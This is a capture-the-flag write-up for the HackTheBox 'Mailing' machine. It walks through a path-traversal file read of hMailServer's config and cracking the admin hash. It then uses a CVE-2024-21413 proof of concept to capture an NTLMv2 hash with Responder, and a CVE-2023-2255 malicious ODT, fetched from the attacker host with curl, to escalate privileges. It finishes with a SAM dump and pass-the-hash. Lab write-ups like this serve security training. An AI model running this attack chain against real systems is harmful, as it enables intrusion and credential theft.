Hackthebox: Mailing

Overview

Mailing is an easy-difficulty machine from HackTheBox that has a file read that discloses hMailServer credentials. Later abusing CVE-2024-21413 to perform a phishing attack and obtain another user’s credentials. Finally exploiting LibreOffice’s CVE-2023-2255 to gain Administrator access. It was a fun box to tackle :D

Mailing-info-card

Reconnaissance

┌──(kali㉿kali)-[~]
└─$ nmap -A -Pn 10.129.134.70
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2024-09-06 11:09 EDT
Nmap scan report for 10.129.134.70
Host is up (0.39s latency).
Not shown: 990 filtered ports
PORT    STATE SERVICE       VERSION
25/tcp  open  smtp          hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP, 
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY 
80/tcp  open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://mailing.htb
110/tcp open  pop3          hMailServer pop3d
|_pop3-capabilities: TOP USER UIDL
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
143/tcp open  imap          hMailServer imapd
|_imap-capabilities: OK IMAP4 IDLE CAPABILITY RIGHTS=texkA0001 NAMESPACE ACL IMAP4rev1 QUOTA SORT completed CHILDREN
445/tcp open  microsoft-ds?
465/tcp open  ssl/smtp      hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP, 
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY 
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
|_ssl-date: TLS randomness does not represent time
587/tcp open  smtp          hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP, 
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY 
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
|_ssl-date: TLS randomness does not represent time
993/tcp open  ssl/imap      hMailServer imapd
|_imap-capabilities: OK IMAP4 IDLE CAPABILITY RIGHTS=texkA0001 NAMESPACE ACL IMAP4rev1 QUOTA SORT completed CHILDREN
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
|_ssl-date: TLS randomness does not represent time
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m58s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-09-06T15:13:23
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 128.63 seconds

We can see that we have plenty of open ports (obviously since this is a windows box), one interesting port tho was 25, I’ll make sure to check it out later.
Also port 80 show us that it’s redirecting towards mailing.htb so we go ahead and add that entry to our /etc/hosts.

Web Application - http://mailing.htb

Mailing-info-card

We can see that we have a simple web application that’s telling us it’s using hMailServer (we already know this from our nmap scan) and that we can download some instructions.

Local File Inclusion - http://mailing.htb

There was one interesting thing, which is tha path on the Download Instructions button: http://mailing.htb/download.php?file=instructions.pdf, maybe we could leverage it to read other files on system and abuse a Local File Inclusion;

Unlike linux systems, the hosts file for windows is located under c:/windows/syste32/drivers/etc/hosts, let’s try and get it:

Local File Inclusion

We can see that we can successfully download the hosts file.
But what’s something critical that we can download? I checked the hMailServer docs to locate the config files for it, turns out to be c:\Program Files (x86)\hMailServer\Bin\hMailServer.ini
And we can successfully download it:

Local File Inclusion

[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1

We can see that we have tha AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
We go ahead and try to crack it:

┌──(kali㉿kali)-[~]
└─$ hashid -m  '841bb5acfa6779ae432fd7a4e6600ba7'                                      
Analyzing '841bb5acfa6779ae432fd7a4e6600ba7'
[+] MD2 
[+] MD5 [Hashcat Mode: 0]
[+] MD4 [Hashcat Mode: 900]
[+] Double MD5 [Hashcat Mode: 2600]
[+] LM [Hashcat Mode: 3000]
[+] RIPEMD-128 
[+] Haval-128 
[+] Tiger-128 
[+] Skein-256(128) 
[+] Skein-512(128) 
[+] Lotus Notes/Domino 5 [Hashcat Mode: 8600]
[+] Skype [Hashcat Mode: 23]
[+] Snefru-128 
[+] NTLM [Hashcat Mode: 1000]
[+] Domain Cached Credentials [Hashcat Mode: 1100]
[+] Domain Cached Credentials 2 [Hashcat Mode: 2100]
[+] DNSSEC(NSEC3) [Hashcat Mode: 8300]
[+] RAdmin v2.x [Hashcat Mode: 9900]
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~]
└─$ hashcat '841bb5acfa6779ae432fd7a4e6600ba7' -m 0 /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-AMD Ryzen 7 4800H with Radeon Graphics, 1417/1481 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 65 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

841bb5acfa6779ae432fd7a4e6600ba7:homenetworkingadministrator
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: MD5
Hash.Target......: 841bb5acfa6779ae432fd7a4e6600ba7
Time.Started.....: Fri Sep  6 12:49:48 2024 (5 secs)
Time.Estimated...: Fri Sep  6 12:49:53 2024 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1601.0 kH/s (0.34ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 7565312/14344385 (52.74%)
Rejected.........: 0/7565312 (0.00%)
Restore.Point....: 7561216/14344385 (52.71%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: homie g 1 -> holmzy

Started: Fri Sep  6 12:49:22 2024
Stopped: Fri Sep  6 12:49:55 2024

And our password is: homenetworkingadministrator

CVE-2024-21413

Let’s try and connect to the hMailServer instance. We could also see on our nmap scan that there’s the POP3 being used.
We can see from the docs that we can connect using telnet mailing.htb 110 (110 is the port utilizing POP3):

┌──(kali㉿kali)-[~]
└─$ telnet 10.129.134.70 110
Trying 10.129.134.70...
Connected to 10.129.134.70.
Escape character is '^]'.
+OK POP3
USER [email protected]
+OK Send your password
PASS homenetworkingadministrator
+OK Mailbox locked and ready
stat
+OK 0 0
list
+OK 0 messages (0 octets)

We can see that there are no messages.
Since hMailServer is a e-mail server for Microsoft Windows, I tried looking for some Microsoft Outlook CVEs and stumbled upon CVE-2024-21413 and found this poc online. (we can find the maya email on the instructions pdf)

┌──(kali㉿kali)-[~]
└─$ python3 CVE-2024-21413.py --server mailing.htb --port 587 --username [email protected] --password homenetworkingadministrator --sender [email protected] --recipient [email protected] --url "\\10.10.x.x" --subject 0xkujen

                                                                                                                                                                                 
┌──(kali㉿kali)-[~]
└─$ sudo responder -I tun0 -v
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie ([email protected])
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [OFF]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.x.x]
    Responder IPv6             [dead:beef:4::1021]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-TQ56G1P1WI8]
    Responder Domain Name      [FNWB.LOCAL]
    Responder DCE-RPC Port     [46022]

[+] Listening for events...                                                                                                                                                      

[!] Error starting SSL server on port 5986, check permissions or other servers running.
[!] Error starting SSL server on port 443, check permissions or other servers running.
[!] Error starting SSL server on port 636, check permissions or other servers running.
[SMB] NTLMv2-SSP Client   : 10.129.169.187
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash     : maya::MAILING:66b91e7843389fd5:162A1E0F0240E39E7229099EFC356A8D:0101000000000000007267A07100DB0150DB3FCED62A46F1000000000200080046004E005700420001001E00570049004E002D005400510035003600470031005000310057004900380004003400570049004E002D00540051003500360047003100500031005700490038002E0046004E00570042002E004C004F00430041004C000300140046004E00570042002E004C004F00430041004C000500140046004E00570042002E004C004F00430041004C0007000800007267A07100DB0106000400020000000800300030000000000000000000000000200000FF3B5AB2762C9414CC314D780DD2A102C128EF1942103204E01B99A7C712D3510A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00330035000000000000000000 

We can now try to crack the hash:

┌──(kali㉿kali)-[~]
└─$ hashcat -m 5600 -a 0  hash.txt /usr/share/wordlists/rockyou.txt                                                                                    255 ⨯
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-AMD Ryzen 7 4800H with Radeon Graphics, 1417/1481 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 65 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

MAYA::MAILING:66b91e7843389fd5:162a1e0f0240e39e7229099efc356a8d:0101000000000000007267a07100db0150db3fced62a46f1000000000200080046004e005700420001001e00570049004e002d005400510035003600470031005000310057004900380004003400570049004e002d00540051003500360047003100500031005700490038002e0046004e00570042002e004c004f00430041004c000300140046004e00570042002e004c004f00430041004c000500140046004e00570042002e004c004f00430041004c0007000800007267a07100db0106000400020000000800300030000000000000000000000000200000ff3b5ab2762c9414cc314d780dd2a102c128ef1942103204e01b99a7c712d3510a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00330035000000000000000000:m4y4ngs4ri
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: MAYA::MAILING:66b91e7843389fd5:162a1e0f0240e39e7229...000000
Time.Started.....: Fri Sep  6 15:33:50 2024 (6 secs)
Time.Estimated...: Fri Sep  6 15:33:56 2024 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1151.4 kH/s (1.79ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 5935104/14344385 (41.38%)
Rejected.........: 0/5935104 (0.00%)
Restore.Point....: 5931008/14344385 (41.35%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: m6161 -> m3808w

Started: Fri Sep  6 15:33:46 2024
Stopped: Fri Sep  6 15:33:57 2024

The password is maya:m4y4ngs4ri. Let’s try to evil-winrm into the machine and get our user flag:

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i mailing.htb -u maya -p m4y4ngs4ri

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maya\Documents> type ../desktop/user.txt
4c87690f004975******************
*Evil-WinRM* PS C:\Users\maya\Documents> 

Privilege Escalation - CVE-2023-2255

Doing some research of the machine, I identify that LibreOffice is installed. Checking the version we find it vulnerable to CVE-2023-2255 and I used this public POC for it. I will be abusing the poc to add maya to the Administrators local group:

┌──(kali㉿kali)-[~/CVE-2023-2255]
└─$ python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add'
File output.odt has been created !

We go ahead and create our output.odt file (it’s Administradores instead of Administrators because the machine is not in english haha)

┌──(kali㉿kali)-[~/CVE-2023-2255]
└─$ python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add'
File output.odt has been created !

(not sure why the execution didn’t work on other folders)

*Evil-WinRM* PS C:\important documents> curl -o output.odt 10.10.x.x:8080/output.odt
*Evil-WinRM* PS C:\important documents> ls


    Directory: C:\important documents


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          9/6/2024   9:53 PM          30526 output.odt


*Evil-WinRM* PS C:\important documents> ./output.odt
*Evil-WinRM* PS C:\important documents> net users maya
User name                    maya
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2024-04-12 4:16:20 AM
Password expires             Never
Password changeable          2024-04-12 4:16:20 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2024-09-06 9:53:32 PM

Logon hours allowed          All

Local Group Memberships      *Administradores      *Remote Management Use
                             *Usuarios             *Usuarios de escritori
Global Group memberships     *Ninguno
The command completed successfully.

*Evil-WinRM* PS C:\important documents>

We can now use crackmapexec to dump the SAM database:

┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 10.129.169.187 -u maya -p "m4y4ngs4ri" --sam
/usr/lib/python3/dist-packages/paramiko/transport.py:219: CryptographyDeprecationWarning: Blowfish has been deprecated and will be removed in a future release
  "class": algorithms.Blowfish,
SMB         10.129.169.187  445    MAILING          [*] Windows 10 / Server 2019 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB         10.129.169.187  445    MAILING          [+] MAILING\maya:m4y4ngs4ri (Pwn3d!)
SMB         10.129.169.187  445    MAILING          [+] Dumping SAM hashes
SMB         10.129.169.187  445    MAILING          Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.169.187  445    MAILING          Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.169.187  445    MAILING          DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.169.187  445    MAILING          WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e349e2966c623fcb0a254e866a9a7e4c:::
SMB         10.129.169.187  445    MAILING          localadmin:1001:aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae:::
SMB         10.129.169.187  445    MAILING          maya:1002:aad3b435b51404eeaad3b435b51404ee:af760798079bf7a3d80253126d3d28af:::
SMB         10.129.169.187  445    MAILING          [+] Added 6 SAM hashes to the database

And finally connect to Administrator and retrieve our root flag:

┌──(kali㉿kali)-[~]
└─$ impacket-wmiexec [email protected] -hashes "aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae"                                                   1 ⨯
Impacket v0.12.0.dev1+20240711.104209.512a1db5 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>cd Users
C:\Users>cd localadmin
C:\Users\localadmin>cd Desktop
C:\Users\localadmin\Desktop>type root.txt
be8a15d7157fd9******************

C:\Users\localadmin\Desktop>

Hope you liked it!
-0xkujen